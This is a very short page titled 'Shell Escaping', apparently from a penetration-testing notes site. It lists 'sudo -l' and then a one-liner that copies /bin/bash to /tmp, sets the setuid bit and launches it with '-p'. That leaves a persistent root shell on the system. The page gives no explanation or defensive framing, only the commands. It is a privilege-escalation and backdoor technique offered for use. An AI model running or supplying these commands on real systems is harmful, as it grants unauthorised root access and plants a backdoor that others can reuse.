For the complete documentation index, see llms.txt. This page is also available as Markdown.

Shell Escaping

sudo -l
cp /bin/bash /tmp/bash && chmod +s /tmp/bash && /tmp/bash -p

Last updated